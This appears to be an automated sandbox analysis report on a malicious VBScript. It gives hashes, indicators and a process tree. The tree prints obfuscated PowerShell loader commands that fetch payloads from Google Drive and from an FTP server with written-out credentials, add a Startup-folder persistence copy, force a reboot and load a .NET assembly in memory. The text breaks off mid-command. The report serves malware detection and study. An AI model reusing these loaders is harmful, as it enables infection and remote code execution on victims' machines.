84b91713ac74dfd54024b218dc6149cb60646018f70e4ee50e5038b84e43a70c

General

Target

84b91713ac74dfd54024b218dc6149cb60646018f70e4ee50e5038b84e43a70c.vbs
Size

683KB
MD5

89af3d1c013508a4c303b662082b37b5
SHA1

27c09a549b4aa399d03440fc543fc72cea662231
SHA256

84b91713ac74dfd54024b218dc6149cb60646018f70e4ee50e5038b84e43a70c
SHA512

716a5bf5a788d976138dac3c7b7eb968fb4c20ec06bf45e2d0dfc99aa4f1594eb067285c2c0597999876067951627722634cc9fc243a3736e535a13c385569f6
SSDEEP

1536:4vvvvvvvvvvvvvvvvvvvvvvvL88888888888888888888888888888888888888R:fvE

Score

10^/10

execution

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

https://drive.google.com/uc?export=download&id=

Signatures

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\84b91713ac74dfd54024b218dc6149cb60646018f70e4ee50e5038b84e43a70c.vbs	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\84b91713ac74dfd54024b218dc6149cb60646018f70e4ee50e5038b84e43a70c.vbs	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2092	powershell.exe
2696	powershell.exe
2772	powershell.exe

Drops file in Windows directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Logs\DPX\setupact.log	wusa.exe
File opened for modification	C:\Windows\Logs\DPX\setuperr.log	wusa.exe
File created	C:\Windows\wusa.lock	wusa.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
2696	powershell.exe
2092	powershell.exe
2852	powershell.exe
2772	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	2696	powershell.exe
Token: SeDebugPrivilege	2092	powershell.exe
Token: SeDebugPrivilege	2852	powershell.exe
Token: SeDebugPrivilege	2772	powershell.exe

Suspicious use of WriteProcessMemory 15 IoCs

description	pid	Process	procid_target
PID 2364 wrote to memory of 2696	2364	WScript.exe	30
PID 2364 wrote to memory of 2696	2364	WScript.exe	30
PID 2364 wrote to memory of 2696	2364	WScript.exe	30
PID 2696 wrote to memory of 2092	2696	powershell.exe	32
PID 2696 wrote to memory of 2092	2696	powershell.exe	32
PID 2696 wrote to memory of 2092	2696	powershell.exe	32
PID 2092 wrote to memory of 2852	2092	powershell.exe	33
PID 2092 wrote to memory of 2852	2092	powershell.exe	33
PID 2092 wrote to memory of 2852	2092	powershell.exe	33
PID 2852 wrote to memory of 2744	2852	powershell.exe	34
PID 2852 wrote to memory of 2744	2852	powershell.exe	34
PID 2852 wrote to memory of 2744	2852	powershell.exe	34
PID 2092 wrote to memory of 2772	2092	powershell.exe	35
PID 2092 wrote to memory of 2772	2092	powershell.exe	35
PID 2092 wrote to memory of 2772	2092	powershell.exe	35

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\84b91713ac74dfd54024b218dc6149cb60646018f70e4ee50e5038b84e43a70c.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:2364
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$mpAQs = 'OwB9ШḆЉDsШḆЉKQШḆЉgШḆЉCkШḆЉIШḆЉШḆЉnШḆЉDEШḆЉZQB1ШḆЉHIШḆЉdШḆЉШḆЉnШḆЉCШḆЉШḆЉLШḆЉШḆЉgШḆЉGUШḆЉagB3ШḆЉHoШḆЉaШḆЉШḆЉkШḆЉCШḆЉШḆЉLШḆЉШḆЉgШḆЉCcШḆЉaШḆЉB0ШḆЉHQШḆЉcШḆЉBzШḆЉDoШḆЉLwШḆЉvШḆЉHШḆЉШḆЉNwШḆЉuШḆЉHQШḆЉcgШḆЉxШḆЉC4ШḆЉbgШḆЉwШḆЉC4ШḆЉYwBkШḆЉG4ШḆЉLgB6ШḆЉGkШḆЉZwBoШḆЉHQШḆЉLgBjШḆЉG8ШḆЉbQШḆЉvШḆЉGkШḆЉdШḆЉBlШḆЉG0ШḆЉcwШḆЉvШḆЉHoШḆЉOШḆЉB1ШḆЉFIШḆЉNQBtШḆЉGsШḆЉWШḆЉШḆЉvШḆЉGEШḆЉNgBhШḆЉDYШḆЉNШḆЉBhШḆЉDYШḆЉMwШḆЉtШḆЉDEШḆЉNgШḆЉ4ШḆЉGUШḆЉLQШḆЉ0ШḆЉDMШḆЉMgBkШḆЉC0ШḆЉOШḆЉШḆЉ4ШḆЉDgШḆЉNwШḆЉtШḆЉGIШḆЉOШḆЉШḆЉxШḆЉDIШḆЉYgBiШḆЉDEШḆЉNQШḆЉ1ШḆЉDkШḆЉMgШḆЉyШḆЉC4ШḆЉdШḆЉB4ШḆЉHQШḆЉPwByШḆЉGUШḆЉcwBwШḆЉG8ШḆЉbgBzШḆЉGUШḆЉLQBjШḆЉG8ШḆЉbgB0ШḆЉGUШḆЉbgB0ШḆЉC0ШḆЉZШḆЉBpШḆЉHMШḆЉcШḆЉBvШḆЉHMШḆЉaQB0ШḆЉGkШḆЉbwBuШḆЉD0ШḆЉYQB0ШḆЉHQШḆЉYQBjШḆЉGgШḆЉbQBlШḆЉG4ШḆЉdШḆЉШḆЉlШḆЉDMШḆЉQgШḆЉrШḆЉGYШḆЉaQBsШḆЉGUШḆЉbgBhШḆЉG0ШḆЉZQШḆЉlШḆЉDMШḆЉRШḆЉШḆЉlШḆЉDIШḆЉMgBpШḆЉG4ШḆЉZwByШḆЉGkШḆЉZШḆЉШḆЉuШḆЉDIШḆЉNgШḆЉuШḆЉDШḆЉШḆЉOШḆЉШḆЉuШḆЉDIШḆЉMШḆЉШḆЉyШḆЉDQШḆЉLgB0ШḆЉHgШḆЉdШḆЉШḆЉlШḆЉDIШḆЉMgШḆЉlШḆЉDMШḆЉQgШḆЉrШḆЉGYШḆЉaQBsШḆЉGUШḆЉbgBhШḆЉG0ШḆЉZQШḆЉlШḆЉDIШḆЉQQШḆЉlШḆЉDMШḆЉRШḆЉBVШḆЉFQШḆЉRgШḆЉtШḆЉDgШḆЉJQШḆЉyШḆЉDcШḆЉJQШḆЉyШḆЉDcШḆЉaQBuШḆЉGcШḆЉcgBpШḆЉGQШḆЉLgШḆЉyШḆЉDYШḆЉLgШḆЉwШḆЉDgШḆЉLgШḆЉyШḆЉDШḆЉШḆЉMgШḆЉ0ШḆЉC4ШḆЉdШḆЉB4ШḆЉHQШḆЉJgBzШḆЉG8ШḆЉdQByШḆЉGMШḆЉZQШḆЉ9ШḆЉGQШḆЉbwB3ШḆЉG4ШḆЉbШḆЉBvШḆЉGEШḆЉZШḆЉШḆЉmШḆЉHYШḆЉPQШḆЉlШḆЉDIШḆЉMgBlШḆЉGUШḆЉNgШḆЉ2ШḆЉDUШḆЉNQШḆЉ3ШḆЉDEШḆЉNШḆЉШḆЉxШḆЉDUШḆЉMwШḆЉyШḆЉGMШḆЉZШḆЉШḆЉ1ШḆЉDQШḆЉOQBiШḆЉDEШḆЉOQBkШḆЉDgШḆЉNШḆЉШḆЉxШḆЉDMШḆЉOШḆЉBlШḆЉDYШḆЉYgШḆЉwШḆЉDgШḆЉJQШḆЉyШḆЉDIШḆЉJwШḆЉgШḆЉCgШḆЉIШḆЉBdШḆЉF0ШḆЉWwB0ШḆЉGMШḆЉZQBqШḆЉGIШḆЉbwBbШḆЉCШḆЉШḆЉLШḆЉШḆЉgШḆЉGwШḆЉbШḆЉB1ШḆЉG4ШḆЉJШḆЉШḆЉgШḆЉCgШḆЉZQBrШḆЉG8ШḆЉdgBuШḆЉEkШḆЉLgШḆЉpШḆЉCШḆЉШḆЉJwBJШḆЉFYШḆЉRgByШḆЉHШḆЉШḆЉJwШḆЉgШḆЉCgШḆЉZШḆЉBvШḆЉGgШḆЉdШḆЉBlШḆЉE0ШḆЉdШḆЉBlШḆЉEcШḆЉLgШḆЉpШḆЉCcШḆЉMQBzШḆЉHMШḆЉYQBsШḆЉEMШḆЉLgШḆЉzШḆЉHkШḆЉcgBhШḆЉHIШḆЉYgBpШḆЉEwШḆЉcwBzШḆЉGEШḆЉbШḆЉBDШḆЉCcШḆЉKШḆЉBlШḆЉHШḆЉШḆЉeQBUШḆЉHQШḆЉZQBHШḆЉC4ШḆЉKQШḆЉgШḆЉHgШḆЉbQB6ШḆЉFgШḆЉeШḆЉШḆЉkШḆЉCШḆЉШḆЉKШḆЉBkШḆЉGEШḆЉbwBMШḆЉC4ШḆЉbgBpШḆЉGEШḆЉbQBvШḆЉEQШḆЉdШḆЉBuШḆЉGUШḆЉcgByШḆЉHUШḆЉQwШḆЉ6ШḆЉDoШḆЉXQBuШḆЉGkШḆЉYQBtШḆЉG8ШḆЉRШḆЉBwШḆЉHШḆЉШḆЉQQШḆЉuШḆЉG0ШḆЉZQB0ШḆЉHMШḆЉeQBTШḆЉFsШḆЉOwШḆЉpШḆЉCШḆЉШḆЉKQШḆЉgШḆЉCcШḆЉQQШḆЉnШḆЉCШḆЉШḆЉLШḆЉШḆЉgШḆЉCcШḆЉkyE6ШḆЉJMhJwШḆЉgШḆЉCgШḆЉZQBjШḆЉGEШḆЉbШḆЉBwШḆЉGUШḆЉUgШḆЉuШḆЉGcШḆЉUwB6ШḆЉEMШḆЉQgBsШḆЉCQШḆЉIШḆЉШḆЉoШḆЉGcШḆЉbgBpШḆЉHIШḆЉdШḆЉBTШḆЉDQШḆЉNgBlШḆЉHMШḆЉYQBCШḆЉG0ШḆЉbwByШḆЉEYШḆЉOgШḆЉ6ШḆЉF0ШḆЉdШḆЉByШḆЉGUШḆЉdgBuШḆЉG8ШḆЉQwШḆЉuШḆЉG0ШḆЉZQB0ШḆЉHMШḆЉeQBTШḆЉFsШḆЉIШḆЉШḆЉ9ШḆЉCШḆЉШḆЉeШḆЉBtШḆЉHoШḆЉWШḆЉB4ШḆЉCQШḆЉIШḆЉBdШḆЉF0ШḆЉWwBlШḆЉHQШḆЉeQBCШḆЉFsШḆЉOwШḆЉnШḆЉCUШḆЉSQBoШḆЉHEШḆЉUgBYШḆЉCUШḆЉJwШḆЉgШḆЉD0ШḆЉIШḆЉBlШḆЉGoШḆЉdwB6ШḆЉGgШḆЉJШḆЉШḆЉ7ШḆЉCkШḆЉIШḆЉBnШḆЉFMШḆЉegBDШḆЉEIШḆЉbШḆЉШḆЉkШḆЉCШḆЉШḆЉKШḆЉBnШḆЉG4ШḆЉaQByШḆЉHQШḆЉUwBkШḆЉGEШḆЉbwBsШḆЉG4ШḆЉdwBvШḆЉEQШḆЉLgBvШḆЉGkШḆЉbШḆЉBzШḆЉEMШḆЉJШḆЉШḆЉgШḆЉD0ШḆЉIШḆЉBnШḆЉFMШḆЉegBDШḆЉEIШḆЉbШḆЉШḆЉkШḆЉDsШḆЉOШḆЉBGШḆЉFQШḆЉVQШḆЉ6ШḆЉDoШḆЉXQBnШḆЉG4ШḆЉaQBkШḆЉG8ШḆЉYwBuШḆЉEUШḆЉLgB0ШḆЉHgШḆЉZQBUШḆЉC4ШḆЉbQBlШḆЉHQШḆЉcwB5ШḆЉFMШḆЉWwШḆЉgШḆЉD0ШḆЉIШḆЉBnШḆЉG4ШḆЉaQBkШḆЉG8ШḆЉYwBuШḆЉEUШḆЉLgBvШḆЉGkШḆЉbШḆЉBzШḆЉEMШḆЉJШḆЉШḆЉ7ШḆЉCkШḆЉdШḆЉBuШḆЉGUШḆЉaQBsШḆЉEMШḆЉYgBlШḆЉFcШḆЉLgB0ШḆЉGUШḆЉTgШḆЉgШḆЉHQШḆЉYwBlШḆЉGoШḆЉYgBPШḆЉC0ШḆЉdwBlШḆЉE4ШḆЉKШḆЉШḆЉgШḆЉD0ШḆЉIШḆЉBvШḆЉGkШḆЉbШḆЉBzШḆЉEMШḆЉJШḆЉШḆЉ7ШḆЉCkШḆЉKШḆЉBlШḆЉHMШḆЉbwBwШḆЉHMШḆЉaQBkШḆЉC4ШḆЉbwBpШḆЉGwШḆЉcwBDШḆЉCQШḆЉOwШḆЉpШḆЉCШḆЉШḆЉJwB0ШḆЉHgШḆЉdШḆЉШḆЉuШḆЉDEШḆЉMШḆЉBMШḆЉEwШḆЉRШḆЉШḆЉvШḆЉDEШḆЉMШḆЉШḆЉvШḆЉHIШḆЉZQB0ШḆЉHШḆЉШḆЉeQByШḆЉGMШḆЉcШḆЉBVШḆЉC8ШḆЉcgBiШḆЉC4ШḆЉbQBvШḆЉGMШḆЉLgB0ШḆЉGEШḆЉcgBiШḆЉHYШḆЉawBjШḆЉHMШḆЉZQBkШḆЉC4ШḆЉcШḆЉB0ШḆЉGYШḆЉQШḆЉШḆЉxШḆЉHQШḆЉYQByШḆЉGIШḆЉdgBrШḆЉGMШḆЉcwBlШḆЉGQШḆЉLwШḆЉvШḆЉDoШḆЉcШḆЉB0ШḆЉGYШḆЉJwШḆЉgШḆЉCgШḆЉZwBuШḆЉGkШḆЉcgB0ШḆЉFMШḆЉZШḆЉBhШḆЉG8ШḆЉbШḆЉBuШḆЉHcШḆЉbwBEШḆЉC4ШḆЉbwBpШḆЉGwШḆЉcwBDШḆЉCQШḆЉIШḆЉШḆЉ9ШḆЉCШḆЉШḆЉZwBTШḆЉHoШḆЉQwBCШḆЉGwШḆЉJШḆЉШḆЉ7ШḆЉCkШḆЉJwBШḆЉШḆЉEШḆЉШḆЉcШḆЉBKШḆЉDgШḆЉNwШḆЉ1ШḆЉDEШḆЉMgBvШḆЉHIШḆЉcШḆЉByШḆЉGUШḆЉcШḆЉBvШḆЉGwШḆЉZQB2ШḆЉGUШḆЉZШḆЉШḆЉnШḆЉCwШḆЉJwШḆЉxШḆЉHQШḆЉYQByШḆЉGIШḆЉdgBrШḆЉGMШḆЉcwBlШḆЉGQШḆЉJwШḆЉoШḆЉGwШḆЉYQBpШḆЉHQШḆЉbgBlШḆЉGQШḆЉZQByШḆЉEMШḆЉawByШḆЉG8ШḆЉdwB0ШḆЉGUШḆЉTgШḆЉuШḆЉHQШḆЉZQBOШḆЉC4ШḆЉbQBlШḆЉHQШḆЉcwB5ШḆЉFMШḆЉIШḆЉB0ШḆЉGMШḆЉZQBqШḆЉGIШḆЉbwШḆЉtШḆЉHcШḆЉZQBuШḆЉCШḆЉШḆЉPQШḆЉgШḆЉHMШḆЉbШḆЉBhШḆЉGkШḆЉdШḆЉBuШḆЉGUШḆЉZШḆЉBlШḆЉHIШḆЉQwШḆЉuШḆЉG8ШḆЉaQBsШḆЉHMШḆЉQwШḆЉkШḆЉDsШḆЉOШḆЉBGШḆЉFQШḆЉVQШḆЉ6ШḆЉDoШḆЉXQBnШḆЉG4ШḆЉaQBkШḆЉG8ШḆЉYwBuШḆЉEUШḆЉLgB0ШḆЉHgШḆЉZQBUШḆЉC4ШḆЉbQBlШḆЉHQШḆЉcwB5ШḆЉFMШḆЉWwШḆЉgШḆЉD0ШḆЉIШḆЉBnШḆЉG4ШḆЉaQBkШḆЉG8ШḆЉYwBuШḆЉEUШḆЉLgBvШḆЉGkШḆЉbШḆЉBzШḆЉEMШḆЉJШḆЉШḆЉ7ШḆЉCkШḆЉdШḆЉBuШḆЉGUШḆЉaQBsШḆЉEMШḆЉYgBlШḆЉFcШḆЉLgB0ШḆЉGUШḆЉTgШḆЉgШḆЉHQШḆЉYwBlШḆЉGoШḆЉYgBPШḆЉC0ШḆЉdwBlШḆЉE4ШḆЉKШḆЉШḆЉgШḆЉD0ШḆЉIШḆЉBvШḆЉGkШḆЉbШḆЉBzШḆЉEMШḆЉJШḆЉШḆЉ7ШḆЉGcШḆЉUwB6ШḆЉEMШḆЉQgBsШḆЉCQШḆЉOwШḆЉyШḆЉDEШḆЉcwBsШḆЉFQШḆЉOgШḆЉ6ШḆЉF0ШḆЉZQBwШḆЉHkШḆЉVШḆЉBsШḆЉG8ШḆЉYwBvШḆЉHQШḆЉbwByШḆЉFШḆЉШḆЉeQB0ШḆЉGkШḆЉcgB1ШḆЉGMШḆЉZQBTШḆЉC4ШḆЉdШḆЉBlШḆЉE4ШḆЉLgBtШḆЉGUШḆЉdШḆЉBzШḆЉHkШḆЉUwBbШḆЉCШḆЉШḆЉPQШḆЉgШḆЉGwШḆЉbwBjШḆЉG8ШḆЉdШḆЉBvШḆЉHIШḆЉUШḆЉB5ШḆЉHQШḆЉaQByШḆЉHUШḆЉYwBlШḆЉFMШḆЉOgШḆЉ6ШḆЉF0ШḆЉcgBlШḆЉGcШḆЉYQBuШḆЉGEШḆЉTQB0ШḆЉG4ШḆЉaQBvШḆЉFШḆЉШḆЉZQBjШḆЉGkШḆЉdgByШḆЉGUШḆЉUwШḆЉuШḆЉHQШḆЉZQBOШḆЉC4ШḆЉbQBlШḆЉHQШḆЉcwB5ШḆЉFMШḆЉWwШḆЉ7ШḆЉH0ШḆЉZQB1ШḆЉHIШḆЉdШḆЉШḆЉkШḆЉHsШḆЉIШḆЉШḆЉ9ШḆЉCШḆЉШḆЉawBjШḆЉGEШḆЉYgBsШḆЉGwШḆЉYQBDШḆЉG4ШḆЉbwBpШḆЉHQШḆЉYQBkШḆЉGkШḆЉbШḆЉBhШḆЉFYШḆЉZQB0ШḆЉGEШḆЉYwBpШḆЉGYШḆЉaQB0ШḆЉHIШḆЉZQBDШḆЉHIШḆЉZQB2ШḆЉHIШḆЉZQBTШḆЉDoШḆЉOgBdШḆЉHIШḆЉZQBnШḆЉGEШḆЉbgBhШḆЉE0ШḆЉdШḆЉBuШḆЉGkШḆЉbwBQШḆЉGUШḆЉYwBpШḆЉHYШḆЉcgBlШḆЉFMШḆЉLgB0ШḆЉGUШḆЉTgШḆЉuШḆЉG0ШḆЉZQB0ШḆЉHMШḆЉeQBTШḆЉFsШḆЉewШḆЉgШḆЉGUШḆЉcwBsШḆЉGUШḆЉfQШḆЉgШḆЉGYШḆЉLwШḆЉgШḆЉDШḆЉШḆЉIШḆЉB0ШḆЉC8ШḆЉIШḆЉByШḆЉC8ШḆЉIШḆЉBlШḆЉHgШḆЉZQШḆЉuШḆЉG4ШḆЉdwBvШḆЉGQШḆЉdШḆЉB1ШḆЉGgШḆЉcwШḆЉgШḆЉDsШḆЉJwШḆЉwШḆЉDgШḆЉMQШḆЉgШḆЉHШḆЉШḆЉZQBlШḆЉGwШḆЉcwШḆЉnШḆЉCШḆЉШḆЉZШḆЉBuШḆЉGEШḆЉbQBtШḆЉG8ШḆЉYwШḆЉtШḆЉCШḆЉШḆЉZQB4ШḆЉGUШḆЉLgBsШḆЉGwШḆЉZQBoШḆЉHMШḆЉcgBlШḆЉHcШḆЉbwBwШḆЉDsШḆЉIШḆЉBlШḆЉGMШḆЉcgBvШḆЉGYШḆЉLQШḆЉgШḆЉCkШḆЉIШḆЉШḆЉnШḆЉHШḆЉШḆЉdQB0ШḆЉHIШḆЉYQB0ШḆЉFMШḆЉXШḆЉBzШḆЉG0ШḆЉYQByШḆЉGcШḆЉbwByШḆЉFШḆЉШḆЉXШḆЉB1ШḆЉG4ШḆЉZQBNШḆЉCШḆЉШḆЉdШḆЉByШḆЉGEШḆЉdШḆЉBTШḆЉFwШḆЉcwB3ШḆЉG8ШḆЉZШḆЉBuШḆЉGkШḆЉVwBcШḆЉHQШḆЉZgBvШḆЉHMШḆЉbwByШḆЉGMШḆЉaQBNШḆЉFwШḆЉZwBuШḆЉGkШḆЉbQBhШḆЉG8ШḆЉUgBcШḆЉGEШḆЉdШḆЉBhШḆЉEQШḆЉcШḆЉBwШḆЉEEШḆЉXШḆЉШḆЉnШḆЉCШḆЉШḆЉKwШḆЉgШḆЉEYШḆЉRwByШḆЉFUШḆЉQQШḆЉkШḆЉCШḆЉШḆЉKШḆЉШḆЉgШḆЉG4ШḆЉbwBpШḆЉHQШḆЉYQBuШḆЉGkШḆЉdШḆЉBzШḆЉGUШḆЉRШḆЉШḆЉtШḆЉCШḆЉШḆЉJwШḆЉlШḆЉEkШḆЉaШḆЉBxШḆЉFIШḆЉWШḆЉШḆЉlШḆЉCcШḆЉIШḆЉBtШḆЉGUШḆЉdШḆЉBJШḆЉC0ШḆЉeQBwШḆЉG8ШḆЉQwШḆЉgШḆЉDsШḆЉIШḆЉB0ШḆЉHIШḆЉYQB0ШḆЉHMШḆЉZQByШḆЉG8ШḆЉbgШḆЉvШḆЉCШḆЉШḆЉdШḆЉBlШḆЉGkШḆЉdQBxШḆЉC8ШḆЉIШḆЉBRШḆЉEEШḆЉagB6ШḆЉEkШḆЉIШḆЉBlШḆЉHgШḆЉZQШḆЉuШḆЉGEШḆЉcwB1ШḆЉHcШḆЉIШḆЉBlШḆЉHgШḆЉZQШḆЉuШḆЉGwШḆЉbШḆЉBlШḆЉGgШḆЉcwByШḆЉGUШḆЉdwBvШḆЉHШḆЉШḆЉIШḆЉШḆЉ7ШḆЉCkШḆЉJwB1ШḆЉHMШḆЉbQШḆЉuШḆЉG4ШḆЉaQB3ШḆЉHШḆЉШḆЉVQBcШḆЉCcШḆЉIШḆЉШḆЉrШḆЉCШḆЉШḆЉcШḆЉBqШḆЉEwШḆЉagBNШḆЉCQШḆЉKШḆЉШḆЉgШḆЉD0ШḆЉIШḆЉBRШḆЉEEШḆЉagB6ШḆЉEkШḆЉOwШḆЉpШḆЉCШḆЉШḆЉZQBtШḆЉGEШḆЉTgByШḆЉGUШḆЉcwBVШḆЉDoШḆЉOgBdШḆЉHQШḆЉbgBlШḆЉG0ШḆЉbgBvШḆЉHIШḆЉaQB2ШḆЉG4ШḆЉRQBbШḆЉCШḆЉШḆЉKwШḆЉgШḆЉCcШḆЉXШḆЉBzШḆЉHIШḆЉZQBzШḆЉFUШḆЉXШḆЉШḆЉ6ШḆЉEMШḆЉJwШḆЉoШḆЉCШḆЉШḆЉPQШḆЉgШḆЉEYШḆЉRwByШḆЉFUШḆЉQQШḆЉkШḆЉDsШḆЉKQШḆЉnШḆЉHUШḆЉcwBtШḆЉC4ШḆЉbgBpШḆЉHcШḆЉcШḆЉBVШḆЉFwШḆЉJwШḆЉgШḆЉCsШḆЉIШḆЉBwШḆЉGoШḆЉTШḆЉBqШḆЉE0ШḆЉJШḆЉШḆЉgШḆЉCwШḆЉQgBLШḆЉEwШḆЉUgBVШḆЉCQШḆЉKШḆЉBlШḆЉGwШḆЉaQBGШḆЉGQШḆЉYQBvШḆЉGwШḆЉbgB3ШḆЉG8ШḆЉRШḆЉШḆЉuШḆЉHcШḆЉSwByШḆЉHUШḆЉdgШḆЉkШḆЉDsШḆЉOШḆЉBGШḆЉFQШḆЉVQШḆЉ6ШḆЉDoШḆЉXQBnШḆЉG4ШḆЉaQBkШḆЉG8ШḆЉYwBuШḆЉEUШḆЉLgB0ШḆЉHgШḆЉZQBUШḆЉC4ШḆЉbQBlШḆЉHQШḆЉcwB5ШḆЉFMШḆЉWwШḆЉgШḆЉD0ШḆЉIШḆЉBnШḆЉG4ШḆЉaQBkШḆЉG8ШḆЉYwBuШḆЉEUШḆЉLgB3ШḆЉEsШḆЉcgB1ШḆЉHYШḆЉJШḆЉШḆЉ7ШḆЉCkШḆЉdШḆЉBuШḆЉGUШḆЉaQBsШḆЉEMШḆЉYgBlШḆЉFcШḆЉLgB0ШḆЉGUШḆЉTgШḆЉgШḆЉHQШḆЉYwBlШḆЉGoШḆЉYgBPШḆЉC0ШḆЉdwBlШḆЉE4ШḆЉKШḆЉШḆЉgШḆЉD0ШḆЉIШḆЉB3ШḆЉEsШḆЉcgB1ШḆЉHYШḆЉJШḆЉШḆЉ7ШḆЉH0ШḆЉOwШḆЉgШḆЉCkШḆЉJwByШḆЉGcШḆЉOШḆЉBEШḆЉDcШḆЉbwBSШḆЉHMШḆЉZgBWШḆЉGMШḆЉcgШḆЉyШḆЉG4ШḆЉQQBoШḆЉGYШḆЉaШḆЉBWШḆЉDYШḆЉRШḆЉBDШḆЉHgШḆЉUgBxШḆЉG4ШḆЉcQBqШḆЉDUШḆЉagByШḆЉGIШḆЉMQШḆЉnШḆЉCШḆЉШḆЉKwШḆЉgШḆЉFШḆЉШḆЉcШḆЉBWШḆЉGkШḆЉcwШḆЉkШḆЉCgШḆЉIШḆЉШḆЉ9ШḆЉCШḆЉШḆЉUШḆЉBwШḆЉFYШḆЉaQBzШḆЉCQШḆЉewШḆЉgШḆЉGUШḆЉcwBsШḆЉGUШḆЉfQШḆЉ7ШḆЉCШḆЉШḆЉKQШḆЉnШḆЉHgШḆЉNШḆЉBmШḆЉGgШḆЉWgBNШḆЉHcШḆЉTgШḆЉ3ШḆЉFUШḆЉZQBfШḆЉDШḆЉШḆЉXwШḆЉ1ШḆЉF8ШḆЉaQBjШḆЉHMШḆЉYgBoШḆЉDcШḆЉQwBQШḆЉDШḆЉШḆЉSQBmШḆЉFШḆЉШḆЉZШḆЉBBШḆЉDIШḆЉMQШḆЉxШḆЉCcШḆЉIШḆЉШḆЉrШḆЉCAAUABwAFYAaQBzACQAKAAgAD0AIABQAHAAVgBpAHMAJAB7ACAAKQBWAFIAQgBIAEIAJAAoACAAZgBpADsAIAApACcANAA2ACcAKABzAG4AaQBhAHQAbgBvAEMALgBFAFIAVQBUAEMARQBUAEkASABDAFIAQQBfAFIATwBTAFMARQBDAE8AUgBQADoAdgBuAGUAJAAgAD0AIABWAFIAQgBIAEIAJAA7ACcAPQBkAGkAJgBkAGEAbwBsAG4AdwBvAGQAPQB0AHIAbwBwAHgAZQA/AGMAdQAvAG0AbwBjAC4AZQBsAGcAbwBvAGcALgBlAHYAaQByAGQALwAvADoAcwBwAHQAdABoACcAIAA9ACШḆЉAUABwAFYAaQBzACQAOwApACcAdQBzAG0ALgBuAGkAdwBwAFUAXAAnACAAKwAgAHAAagBMAGoATQAkACgAIABsAGUAZAA7ACkAKABoAHQAYQBQAHAAbQBlAFQAdABlAEcAOgA6AF0AaAB0AGEAUAAuAE8ASQAuAG0AZQB0AHMAeQBTAFsAIAA9ACAAcABqAEwAagBNACQAewAgACkAdgBaAGwAYgBsACQAKAAgAGYAaQA7ACAAKQAyACgAcwBsAGEAdQBxAEUALgByAG8AagBhAE0ALgBuAG8AaQBzAHIAZQBWAC4AdABzAG8AaAAkACAAPQAgAHYAWgBsAGIAbAAkACAAOwA=';$GyXhB = $mpAQs.replace('ШḆЉ' , 'A') ;$VFuwc = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String( $GyXhB ) ); $VFuwc = $VFuwc[-1..-$VFuwc.Length] -join '';$VFuwc = $VFuwc.replace('%XRqhI%','C:\Users\Admin\AppData\Local\Temp\84b91713ac74dfd54024b218dc6149cb60646018f70e4ee50e5038b84e43a70c.vbs');powershell $VFuwc
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2696
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $lblZv = $host.Version.Major.Equals(2) ;if ($lblZv) {$MjLjp = [System.IO.Path]::GetTempPath();del ($MjLjp + '\Upwin.msu');$siVpP = 'https://drive.google.com/uc?export=download&id=';$BHBRV = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ($BHBRV) {$siVpP = ($siVpP + '112AdPfI0PC7hbsci_5_0_eU7NwMZhf4x') ;}else {$siVpP = ($siVpP + '1brj5jqnqRxCD6VhfhAn2rcVfsRo7D8gr') ;};$vurKw = (New-Object Net.WebClient);$vurKw.Encoding = [System.Text.Encoding]::UTF8;$vurKw.DownloadFile($URLKB, $MjLjp + '\Upwin.msu');$AUrGF = ('C:\Users\' + [Environment]::UserName );IzjAQ = ($MjLjp + '\Upwin.msu'); powershell.exe wusa.exe IzjAQ /quiet /norestart ; Copy-Item 'C:\Users\Admin\AppData\Local\Temp\84b91713ac74dfd54024b218dc6149cb60646018f70e4ee50e5038b84e43a70c.vbs' -Destination ( $AUrGF + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$Cslio = (New-Object Net.WebClient);$Cslio.Encoding = [System.Text.Encoding]::UTF8;$Cslio.Credentials = new-object System.Net.NetworkCredential('desckvbrat1','developerpro21578Jp@@');$lBCzSg = $Cslio.DownloadString( 'ftp://[email protected]/Upcrypter/01/DLL01.txt' );$Cslio.dispose();$Cslio = (New-Object Net.WebClient);$Cslio.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $Cslio.DownloadString( $lBCzSg );$hzwje = 'C:\Users\Admin\AppData\Local\Temp\84b91713ac74dfd54024b218dc6149cb60646018f70e4ee50e5038b84e43a70c.vbs';[Byte[]] $xXzmx = [System.Convert]::FromBase64String( $lBCzSg.Replace( '↓:↓' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $xXzmx ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( 